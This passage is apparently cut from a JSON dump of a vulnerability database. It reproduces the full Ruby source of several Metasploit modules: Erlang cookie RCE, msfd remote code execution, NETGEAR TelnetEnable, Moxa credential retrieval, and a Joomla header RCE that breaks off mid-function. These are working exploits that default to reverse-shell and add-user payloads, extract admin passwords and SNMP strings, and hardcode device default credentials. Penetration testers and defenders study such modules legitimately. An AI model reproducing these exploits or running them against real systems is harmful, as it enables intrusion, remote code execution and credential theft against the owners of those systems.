"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/pimcore_unserialize_rce.rb"}, {"lastseen": "2019-11-30T11:07:42", "bulletinFamily": "exploit", "description": "The erlang port mapper daemon is used to coordinate distributed erlang instances. Should an attacker get the authentication cookie RCE is trivial. Usually, this cookie is named \".erlang.cookie\" and varies on location.\n", "modified": "2019-10-05T18:40:27", "published": "2018-12-10T01:17:22", "id": "MSF:EXPLOIT/MULTI/MISC/ERLANG_COOKIE_RCE", "href": "", "type": "metasploit", "title": "Erlang Port Mapper Daemon Cookie RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Erlang Port Mapper Daemon Cookie RCE',\n 'Description' => %q{\n The erlang port mapper daemon is used to coordinate distributed erlang instances.\n Should an attacker get the authentication cookie RCE is trivial. Usually, this\n cookie is named \".erlang.cookie\" and varies on location.\n },\n 'Author' =>\n [\n 'Daniel Mende', # blog post article\n 'Milton Valencia (wetw0rk)', # metasploit module\n ],\n 'References' =>\n [\n ['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/']\n ],\n 'License' => MSF_LICENSE,\n 'Privileged' => 'false',\n 'Targets' =>\n [\n [ 'Unix',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},\n ],\n [ 'Linux (CmdStager)',\n 'Type' => :cmdstager,\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'CmdStagerFlavor' => ['printf', 'echo', 'bourne']\n ],\n [ 'Windows',\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'},\n ],\n [ 'Windows (CmdStager)',\n 'Type' => :cmdstager,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'CmdStagerFlavor' => ['certutil', 'vbs'],\n 'DefaultOptions' => {'PAYLOAD' => 'windows/shell/reverse_tcp'}\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Nov 20, 2009', # https://github.com/erlang/otp/blob/master/lib/kernel/src/os.erl (history)\n )\n )\n\n register_options(\n [\n OptString.new('COOKIE', [ true, 'Erlang cookie to login with']),\n Opt::RPORT(25672)\n ])\n end\n\n def generate_challenge_digest(challenge)\n challenge = challenge.unpack('H*')[0].to_i(16).to_s\n\n hash = Digest::MD5.new\n hash.update(datastore['COOKIE'])\n hash.update(challenge)\n\n vprint_status(\"MD5 digest generated: #{hash.hexdigest}\")\n return [hash.hexdigest].pack('H*')\n end\n\n def execute_command(cmd, opts={})\n # SEND: send the message to the node\n send = \"\\x00\\x00\\x00\" # Length:0x00000000\n send << [(0x50 + cmd.length + @our_node.length*2).to_s(16)].pack('H*') #\n send << \"\\x70\" #\n send << \"\\x83\" # VERSION_MAGIC\n send << \"\\x68\" # SMALL_TUPLE_EXT (104)\n send << \"\\x04\" # Arity: 4\n send << \"\\x61\" # SMALL_INTEGER_EXT\n send << \"\\x06\" # Int: 6\n send << \"\\x67\" # PID_EXT (103)\n send << \"\\x64\\x00\" # Node:\n send << [(@our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)\n send << \"#{@our_node}\" # Node\n send << \"\\x00\\x00\\x00\\x03\" # ID\n send << \"\\x00\\x00\\x00\\x00\" # Serial\n send << \"\\x00\" # Creation\n send << \"\\x64\" # InternalSegmentIndex\n send << \"\\x00\\x00\" # Len: 0x0000\n send << \"\\x64\" # InternalSegmentIndex\n send << \"\\x00\\x03\" # Length: 3\n send << \"rex\" # AtomText: rex\n send << \"\\x83\\x68\\x02\\x67\\x64\\x00\" #\n send << [(@our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)\n send << \"#{@our_node}\" # Node\n send << \"\\x00\\x00\\x00\\x03\" # ID\n send << \"\\x00\\x00\\x00\\x00\" # Serial\n send << \"\\x00\" # Creation\n send << \"\\x68\" # SMALL_TUPLE_EXT (104)\n send << \"\\x05\" # Arity: 5\n send << \"\\x64\" # InternalSegmentIndex\n send << \"\\x00\\x04\" # Length: 4\n send << \"call\" # AtomText: call\n send << \"\\x64\" # InternalSegmentIndex\n send << \"\\x00\\x02\" # Length: 2\n send << \"os\" # AtomText: os\n send << \"\\x64\" # InternalSegmentIndex\n send << \"\\x00\\x03\" # Length: 3\n send << \"cmd\" # AtomText: cmd\n send << \"\\x6c\" # LIST_EXT\n send << \"\\x00\\x00\\x00\\x01\" # Length: 1\n send << \"\\x6b\" # Elements: k\n send << \"\\x00\" # Tail\n send << [(cmd.length).to_s(16)].pack('H*') # strlen(Command)\n send << cmd\n send << \"\\x6a\" # NIL_EXT\n send << \"\\x64\" # InternalSegmentIndex\n send << \"\\x00\\x04\" # Length: 4\n send << \"user\" # AtomText: user\n sock.put(send)\n end\n\n def exploit\n connect\n\n @our_node = \"#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}\"\n\n # SEND_NAME: send initial identification of who \"we\" are\n send_name = \"\\x00\" # Length: 0x0000\n send_name << [(@our_node.length+7).to_s(16)].pack('H*') #\n send_name << \"\\x6e\" # Tag: n\n send_name << \"\\x00\\x05\" # Version: R6 (5)\n send_name << \"\\x00\\x03\\x49\\x9c\" # Flags (0x0003499c)\n send_name << \"#{@our_node}\" # <generated>@<generated>\n\n # SEND_CHALLENGE_REPLY: return generated digest and its own challenge\n send_challenge_reply = \"\\x00\\x15\" # Length: 21\n send_challenge_reply << \"\\x72\" # Tag: r\n\n sock.put(send_name)\n\n # receive servers \"SEND_CHALLENGE\" token (4 bytes)\n print_status(\"Receiving server challenge\")\n challenge = sock.get\n challenge = challenge[14,4]\n\n send_challenge_reply << challenge\n send_challenge_reply << generate_challenge_digest(challenge)\n\n print_status(\"Sending challenge reply\")\n sock.put(send_challenge_reply)\n\n if sock.get.length < 1\n fail_with(Failure::UnexpectedReply, \"Authentication Failed:#{datastore['COOKIE']}\")\n end\n\n print_good(\"Authentication successful, sending payload\")\n\n print_status('Exploiting...')\n if target['Type'] == :cmdstager\n execute_cmdstager(:linemax => 100)\n else\n execute_command(payload.raw)\n end\n disconnect\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/erlang_cookie_rce.rb"}, {"lastseen": "2019-12-06T03:15:14", "bulletinFamily": "exploit", "description": "Metasploit's msfd-service makes it possible to get a msfconsole-like interface over a TCP socket. If this socket is accessible on a remote interface, an attacker can execute commands on the victim's machine. If msfd is running with higher privileges than the current local user, this module can also be used for privilege escalation. In that case, port forwarding on the compromised host can be used. Code execution is achieved with the msfconsole command: irb -e 'CODE'.\n", "modified": "2018-04-27T23:35:30", "published": "2018-04-27T23:35:30", "id": "MSF:EXPLOIT/MULTI/MISC/MSFD_RCE_REMOTE", "href": "", "type": "metasploit", "title": "Metasploit msfd Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Metasploit msfd Remote Code Execution',\n 'Description' => %q{\n Metasploit's msfd-service makes it possible to get a msfconsole-like\n interface over a TCP socket. If this socket is accessible on a remote\n interface, an attacker can execute commands on the victim's machine.\n\n If msfd is running with higher privileges than the current local user,\n this module can also be used for privilege escalation. In that case,\n port forwarding on the compromised host can be used.\n\n Code execution is achieved with the msfconsole command: irb -e 'CODE'.\n },\n 'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',\n 'License' => BSD_LICENSE,\n 'Platform' => \"ruby\",\n 'Arch' => ARCH_RUBY,\n 'Payload' =>\n {\n 'Space' => 8192, # Arbitrary limit\n 'BadChars' => \"\\x27\\x0a\",\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n [ 'Automatic', { } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Apr 11 2018', # Vendor notification\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(55554)\n ])\n end\n\n def check\n connect\n data = sock.get_once\n if data.include?(\"msf\")\n disconnect\n return Exploit::CheckCode::Appears\n end\n disconnect\n return Exploit::CheckCode::Unknown\n end\n\n def exploit\n connect\n sock.get_once\n sock.put \"irb -e '\" + payload.encoded + \"'\\n\"\n disconnect\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/msfd_rce_remote.rb"}, {"lastseen": "2019-11-29T09:40:53", "bulletinFamily": "exploit", "description": "This module sends a magic packet to a NETGEAR device to enable telnetd. Upon successful connect, a root shell should be presented to the user.\n", "modified": "2019-03-06T03:02:39", "published": "2018-02-28T06:30:53", "id": "MSF:EXPLOIT/LINUX/TELNET/NETGEAR_TELNETENABLE", "href": "", "type": "metasploit", "title": "NETGEAR TelnetEnable", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Udp\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Capture\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NETGEAR TelnetEnable',\n 'Description' => %q{\n This module sends a magic packet to a NETGEAR device to enable telnetd.\n Upon successful connect, a root shell should be presented to the user.\n },\n 'Author' => [\n 'Paul Gebheim', # Python PoC (TCP)\n 'insanid', # Python PoC (UDP)\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['URL', 'https://wiki.openwrt.org/toh/netgear/telnet.console'],\n ['URL', 'https://github.com/cyanitol/netgear-telenetenable'],\n ['URL', 'https://github.com/insanid/netgear-telenetenable']\n ],\n 'DisclosureDate' => '2009-10-30', # Python PoC (TCP)\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => true,\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'cmd_interact',\n 'ConnectionType' => 'find'\n }\n },\n 'Targets' => [\n ['Automatic (detect TCP or UDP)',\n proto: :auto\n ],\n ['TCP (typically older devices)',\n proto: :tcp,\n username: 'Gearguy',\n password: 'Geardog'\n ],\n ['UDP (typically newer devices)',\n proto: :udp,\n username: 'admin',\n password: 'password'\n ]\n ],\n 'DefaultTarget' => 0\n ))\n\n register_options([\n Opt::RPORT(23),\n OptString.new('MAC', [false, 'MAC address of device']),\n OptString.new('USERNAME', [false, 'Username on device']),\n OptString.new('PASSWORD', [false, 'Password on device'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def default_credential?\n true\n end\n\n def check\n # Run through protocol detection\n detect_proto\n\n # This is a gamble, but it's the closest we can get\n if @proto == :tcp\n CheckCode::Detected\n else\n CheckCode::Unknown\n end\n end\n\n def exploit\n # Try to do the exploit unless telnetd is detected\n @do_exploit = true\n\n # Detect TCP or UDP and presence of telnetd\n @proto = target[:proto]\n detect_proto if @proto == :auto\n\n if @do_exploit\n # Use supplied or ARP-cached MAC address\n configure_mac\n # Use supplied or default creds\n configure_creds\n # Shell it\n exploit_telnetenabled\n end\n\n # Connect to the shell\n connect_telnetd\n end\n\n def detect_proto\n begin\n connect\n\n res = begin\n sock.get_once || ''\n rescue EOFError\n ''\n end\n\n # telnetenabled returns no data, unlike telnetd\n if res.length == 0\n print_good('Detected telnetenabled on TCP')\n else\n print_good('Detected telnetd on TCP')\n @do_exploit = false\n end\n\n @proto = :tcp\n # It's UDP... and we may not get an ICMP error...\n rescue Rex::ConnectionError\n print_good('Detected telnetenabled on UDP')\n @proto = :udp\n ensure\n disconnect\n end\n end\n\n def configure_mac\n @mac = datastore['MAC']\n\n return if @mac\n\n print_status('Attempting to discover MAC address via ARP')\n\n begin\n open_pcap\n @mac = lookup_eth(rhost).first\n rescue RuntimeError => e\n fail_with(Failure::BadConfig, \"#{e}. Are you root?\")\n ensure\n close_pcap\n end\n\n if @mac\n print_good(\"Found MAC address #{@mac}\")\n else\n fail_with(Failure::Unknown, 'Could not find MAC address')\n end\n end\n\n def configure_creds\n @username = datastore['USERNAME'] || target[:username]\n @password = datastore['PASSWORD'] || target[:password]\n\n # Try to use default creds if no creds were found\n unless @username && @password\n tgt = targets.find { |t| t[:proto] == @proto }\n @username = tgt[:username]\n @password = tgt[:password]\n end\n\n print_good(\"Using creds #{@username}:#{@password}\")\n end\n\n def exploit_telnetenabled\n print_status('Generating magic packet')\n payload = magic_packet(@mac, @username, @password)\n\n begin\n print_status(\"Connecting to telnetenabled via #{@proto.upcase}\")\n @proto == :tcp ? connect : connect_udp\n print_status('Sending magic packet')\n @proto == :tcp ? sock.put(payload) : udp_sock.put(payload)\n rescue Rex::ConnectionError\n fail_with(Failure::Disconnected, 'Something happened mid-connection!')\n ensure\n print_status('Disconnecting from telnetenabled')\n @proto == :tcp ? disconnect : disconnect_udp\n end\n\n # Wait a couple seconds for telnetd to come up\n print_status('Waiting for telnetd')\n sleep(2)\n end\n\n def connect_telnetd\n print_status('Connecting to telnetd')\n connect\n handler(sock)\n end\n\n # NOTE: This is almost a verbatim copy of the Python PoC\n def magic_packet(mac, username, password)\n mac = mac.gsub(/[:-]/, '').upcase\n\n if mac.length != 12\n fail_with(Failure::BadConfig, 'MAC must be 12 bytes without : or -')\n end\n just_mac = mac.ljust(0x10, \"\\x00\")\n\n if username.length > 0x10\n fail_with(Failure::BadConfig, 'USERNAME must be <= 16 bytes')\n end\n just_username = username.ljust(0x10, \"\\x00\")\n\n if @proto == :tcp\n if password.length > 0x10\n fail_with(Failure::BadConfig, 'PASSWORD must be <= 16 bytes')\n end\n just_password = password.ljust(0x10, \"\\x00\")\n elsif @proto == :udp\n # Thanks to Roberto Frenna for the reserved field analysis\n if password.length > 0x21\n fail_with(Failure::BadConfig, 'PASSWORD must be <= 33 bytes')\n end\n just_password = password.ljust(0x21, \"\\x00\")\n end\n\n cleartext = (just_mac + just_username + just_password).ljust(0x70, \"\\x00\")\n md5_key = Rex::Text.md5_raw(cleartext)\n\n payload = byte_swap((md5_key + cleartext).ljust(0x80, \"\\x00\"))\n\n secret_key = 'AMBIT_TELNET_ENABLE+' + password\n\n byte_swap(blowfish_encrypt(secret_key, payload))\n end\n\n def blowfish_encrypt(secret_key, payload)\n cipher = OpenSSL::Cipher.new('bf-ecb').encrypt\n\n cipher.padding = 0\n cipher.key_len = secret_key.length\n cipher.key = secret_key\n\n cipher.update(payload) + cipher.final\n end\n\n def byte_swap(data)\n data.unpack('N*').pack('V*')\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/telnet/netgear_telnetenable.rb"}, {"lastseen": "2019-12-07T15:05:29", "bulletinFamily": "exploit", "description": "The Moxa protocol listens on 4800/UDP and will respond to broadcast or direct traffic. The service is known to be used on Moxa devices in the NPort, OnCell, and MGate product lines. Many devices with firmware versions older than 2017 or late 2016 allow admin credentials and SNMP read and read/write community strings to be retrieved without authentication. This module is the work of Patrick DeSantis of Cisco Talos and K. Reid Wightman. Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5, and NPort 5110 firmware 2.6.\n", "modified": "2018-10-10T21:56:17", "published": "2017-05-16T14:21:44", "id": "MSF:AUXILIARY/ADMIN/SCADA/MOXA_CREDENTIALS_RECOVERY", "href": "", "type": "metasploit", "title": "Moxa Device Credential Retrieval", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Udp\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Moxa Device Credential Retrieval',\n 'Description' => %q{\n The Moxa protocol listens on 4800/UDP and will respond to broadcast\n or direct traffic. The service is known to be used on Moxa devices\n in the NPort, OnCell, and MGate product lines. Many devices with\n firmware versions older than 2017 or late 2016 allow admin credentials\n and SNMP read and read/write community strings to be retrieved without\n authentication.\n\n This module is the work of Patrick DeSantis of Cisco Talos and K. Reid\n Wightman.\n\n Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5,\n and NPort 5110 firmware 2.6.\n\n },\n 'Author' =>\n [\n 'Patrick DeSantis <p[at]t-r10t.com>',\n 'K. Reid Wightman <reid[at]revics-security.com>'\n ],\n\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2016-9361'],\n [ 'BID', '85965'],\n [ 'URL', 'https://www.digitalbond.com/blog/2016/10/25/serial-killers/'],\n [ 'URL', 'https://github.com/reidmefirst/MoxaPass/blob/master/moxa_getpass.py' ],\n [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-336-02']\n ],\n 'DisclosureDate' => 'Jul 28 2015'))\n\n register_options([\n # Moxa protocol listens on 4800/UDP by default\n Opt::RPORT(4800),\n OptEnum.new(\"FUNCTION\", [true, \"Pull credentials or enumerate all function codes\", \"CREDS\",\n [\n \"CREDS\",\n \"ENUM\"\n ]])\n ])\n end\n\n def fc() {\n # Function codes\n 'ident' => \"\\x01\", # identify device\n 'name' => \"\\x10\", # get the \"server name\" of the device\n 'netstat' => \"\\x14\", # network activity of the device\n 'unlock1' => \"\\x16\", # \"unlock\" some devices, including 5110, MGate\n 'date_time' => \"\\x1a\", # get the device date and time\n 'time_server' => \"\\x1b\", # get the time server of device\n 'unlock2' => \"\\x1e\", # \"unlock\" 6xxx series devices\n 'snmp_read' => \"\\x28\", # snmp community strings\n 'pass' => \"\\x29\", # admin password of some devices\n 'all_creds' => \"\\x2c\", # snmp comm strings and admin password of 6xxx\n 'enum' => \"enum\" # mock fc to catch \"ENUM\" option\n }\n end\n\n def send_datagram(func, tail)\n if fc[func] == \"\\x01\"\n # identify datagrams have a length of 8 bytes and no tail\n datagram = fc[func] + \"\\x00\\x00\\x08\\x00\\x00\\x00\\x00\"\n begin\n udp_sock.put(datagram)\n response = udp_sock.get(3)\n rescue ::Timeout::Error\n end\n format_output(response)\n # the last 16 bytes of the ident response are used as a form of auth for\n # function codes other than 0x01\n tail = response[8..24]\n elsif fc[func] == \"enum\"\n for i in (\"\\x02\"..\"\\x80\") do\n # start at 2 since 0 is invalid and 1 is ident\n datagram = i + \"\\x00\\x00\\x14\\x00\\x00\\x00\\x00\" + tail\n begin\n udp_sock.put(datagram)\n response = udp_sock.get(3)\n end\n if response[1] != \"\\x04\"\n vprint_status(\"Function Code: #{Rex::Text.to_hex_dump(datagram[0])}\")\n format_output(response)\n end\n end\n else\n # all non-ident datagrams have a len of 14 bytes and include a tail that\n # is comprised of bytes obtained during the ident\n datagram = fc[func] + \"\\x00\\x00\\x14\\x00\\x00\\x00\\x00\" + tail\n begin\n udp_sock.put(datagram)\n response = udp_sock.get(3)\n if valid_resp(fc[func], response) == -1\n # invalid response, so don't bother trying to parse it\n return\n end\n if fc[func] == \"\\x2c\"\n # try this, note it may fail\n get_creds(response)\n end\n if fc[func] == \"\\x29\"\n # try this, note it may fail\n get_pass(response)\n end\n if fc[func] == \"\\x28\"\n # try this, note it may fail\n get_snmp_read(response)\n end\n rescue ::Timeout::Error\n end\n format_output(response)\n end\n end\n\n # helper function for extracting strings from payload\n def get_string(data)\n str_end = data.index(\"\\x00\")\n return data[0..str_end]\n end\n\n # helper function for extracting password from 0x29 FC response\n def get_pass(response)\n if response.length() < 200\n print_error(\"get_pass failed: response not long enough\")\n return\n end\n pass = get_string(response[200..-1])\n print_good(\"password retrieved: #{pass}\")\n store_loot(\"moxa.get_pass.admin_pass\", \"text/plain\", rhost, pass)\n return pass\n end\n\n # helper function for extracting snmp community from 0x28 FC response\n def get_snmp_read(response)\n if response.length() < 24\n print_error(\"get_snmp_read failed: response not long enough\")\n return\n end\n snmp_string = get_string(response[24..-1])\n print_good(\"snmp community retrieved: #{snmp_string}\")\n store_loot(\"moxa.get_pass.snmp_read\", \"text/plain\", rhost, snmp_string)\n end\n\n # helper function for extracting snmp community from 0x2C FC response\n def get_snmp_write(response)\n if response.length() < 64\n print_error(\"get_snmp_write failed: response not long enough\")\n return\n end\n snmp_string = get_string(response[64..-1])\n print_good(\"snmp read/write community retrieved: #{snmp_string}\")\n store_loot(\"moxa.get_pass.snmp_write\", \"text/plain\", rhost, snmp_string)\n end\n\n # helper function for extracting snmp and pass from 0x2C FC response\n # Note that 0x2C response is basically 0x28 and 0x29 mashed together\n def get_creds(response)\n if response.length() < 200\n # attempt failed. device may not be unlocked\n print_error(\"get_creds failed: response not long enough. Will fall back to other functions\")\n return -1\n end\n get_snmp_read(response)\n get_snmp_write(response)\n get_pass(response)\n end\n\n # helper function to verify that the response was actually for our request\n # Simply makes sure the response function code has most significant bit\n # of the request number set\n # returns 0 if everything is ok\n # returns -1 if functions don't match\n def valid_resp(func, resp)\n # get the query function code to an integer\n qfc = func.unpack(\"C\")[0]\n # make the response function code an integer\n rfc = resp[0].unpack(\"C\")[0]\n if rfc == (qfc + 0x80)\n return 0\n else\n return -1\n end\n end\n\n def format_output(resp)\n # output response bytes as hexdump\n vprint_status(\"Response:\\n#{Rex::Text.to_hex_dump(resp)}\")\n end\n def check\n connect_udp\n\n begin\n # send the identify command\n udp_sock.put(\"\\x01\\x00\\x00\\x08\\x00\\x00\\x00\\x00\")\n response = udp_sock.get(3)\n end\n\n if response\n # A valid response is 24 bytes, starts with 0x81, and contains the values\n # 0x00, 0x90, 0xe8 (the Moxa OIU) in bytes 14, 15, and 16.\n if response[0] == \"\\x81\" && response[14..16] == \"\\x00\\x90\\xe8\" && response.length == 24\n format_output(response)\n return Exploit::CheckCode::Appears\n end\n else\n vprint_error(\"Unknown response\")\n return Exploit::CheckCode::Unknown\n end\n cleanup\n\n Exploit::CheckCode::Safe\n end\n\n def run\n unless check == Exploit::CheckCode::Appears\n print_error(\"Aborted because the target does not seem vulnerable.\")\n return\n end\n\n function = datastore[\"FUNCTION\"]\n\n connect_udp\n\n # identify the device and get bytes for the \"tail\"\n tail = send_datagram('ident', nil)\n\n # get the \"server name\" from the device\n send_datagram('name', tail)\n\n # \"unlock\" the device\n # We send both versions of the unlock FC, this doesn't seem\n # to hurt anything on any devices tested\n send_datagram('unlock1', tail)\n send_datagram('unlock2', tail)\n\n if function == \"CREDS\"\n # grab data\n send_datagram('all_creds', tail)\n send_datagram('snmp_read', tail)\n send_datagram('pass', tail)\n elsif function == \"ENUM\"\n send_datagram('enum', tail)\n else\n print_error(\"Invalid FUNCTION\")\n end\n\n disconnect_udp\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/scada/moxa_credentials_recovery.rb"}, {"lastseen": "2019-11-25T20:45:53", "bulletinFamily": "exploit", "description": "Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it's possible to truncate the input by sending an UTF-8 character. The custom created payload is then executed once the session is read from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.\n", "modified": "2017-08-29T00:17:58", "published": "2015-12-15T16:37:45", "id": "MSF:EXPLOIT/MULTI/HTTP/JOOMLA_HTTP_HEADER_RCE", "href": "", "type": "metasploit", "title": "Joomla HTTP Header Unauthenticated Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Joomla\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Joomla HTTP Header Unauthenticated Remote Code Execution',\n 'Description' => %q{\n Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5.\n By storing user supplied headers in the databases session table it's possible to truncate the input\n by sending an UTF-8 character. The custom created payload is then executed once the session is read\n from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13.\n In later versions the deserialisation of invalid session data stops on the first error and the\n exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and\n 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.\n },\n 'Author'\t=>\n [\n 'Marc-Alexandre Montpas', # discovery\n 'Christian Mehlmauer' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2015-8562'],\n ['EDB', '38977'], # PoC from Gary\n ['EDB', '39033'], # Exploit modified to use \"X-Forwarded-For\" header instead of \"User-Agent\"\n ['URL', 'https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html'],\n ['URL', 'https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html'],\n ['URL', 'https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html'],\n ['URL', 'https://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/'],\n ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330'],\n ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html'],\n ['URL', 'https://bugs.php.net/bug.php?id=70219']\n ],\n 'Privileged' => false,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [['Joomla 1.5.0 - 3.4.5', {}]],\n 'DisclosureDate' => 'Dec 14 2015',\n 'DefaultTarget' => 0)\n )\n\n register_options(\n [\n OptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]])\n ])\n\n register_advanced_options(\n [\n OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),\n ])\n end\n\n def check\n res = send_request_cgi({'uri' => target_uri.path })\n\n unless res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n unless res.headers['X-Powered-By']\n vprint_error(\"Unable to determine the PHP version.\")\n return Exploit::CheckCode::Unknown\n end\n\n online = joomla_and_online?\n unless online\n vprint_error(\"Unable to detect joomla on #{target_uri.path}\")\n return Exploit::CheckCode::Safe\n end\n\n php_version, rest = res.headers['X-Powered-By'].scan(/PHP\\/([\\d\\.]+)(?:-(.+))?/i).flatten || ''\n version = Gem::Version.new(php_version)\n vulnerable = false\n\n # check for ubuntu and debian specific versions. Was fixed in\n # * 5.5.9+dfsg-1ubuntu4.13\n # * 5.3.10-1ubuntu3.20\n # * 5.4.45-0+deb7u1\n # Changelogs (search for CVE-2015-6835 or #70219):\n # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.5.9+dfsg-1ubuntu4.13/changelog\n # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.3.10-1ubuntu3.20/changelog\n # http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog\n if rest && rest.include?('ubuntu')\n sub_version = rest.scan(/^\\dubuntu([\\d\\.]+)/i).flatten.first || ''\n vprint_status(\"Found Ubuntu PHP version #{res.headers['X-Powered-By']}\")\n\n if version > Gem::Version.new('5.5.9')\n vulnerable = false\n elsif version == Gem::Version.new('5.5.9') && Gem::Version.new(sub_version) >= Gem::Version.new('4.13')\n vulnerable = false\n elsif version == Gem::Version.new('5.3.10') && Gem::Version.new(sub_version) >= Gem::Version.new('3.20')\n vulnerable = false\n else\n vulnerable = true\n end\n elsif rest && rest.include?('+deb')\n sub_version = rest.scan(/^\\d+\\+deb([\\du]+)/i).flatten.first || ''\n vprint_status(\"Found Debian PHP version #{res.headers['X-Powered-By']}\")\n\n if version > Gem::Version.new('5.4.45')\n vulnerable = false\n elsif version == Gem::Version.new('5.4.45') && sub_version != '7u1'\n vulnerable = false\n else\n vulnerable = true\n end\n else\n vprint_status(\"Found PHP version #{res.headers['X-Powered-By']}\")\n vulnerable = true if version <= Gem::Version.new('5.4.44')\n vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))\n vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))\n end\n\n unless vulnerable\n vprint_error('This module currently does not work against this PHP version')\n return Exploit::CheckCode::Safe\n end\n\n j_version = joomla_version\n unless j_version.nil?\n vprint_status(\"Detected Joomla version #{j_version}\")\n return Exploit::CheckCode::Appears if Gem::Version.new(j_version) < Gem::Version.new('3.4.6')\n end\n\n return Exploit::CheckCode::Detected if online\n\n Exploit::CheckCode::Safe\n end\n\n def get_payload(header_name)\n pre = \"#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|\"\n pre_pay = 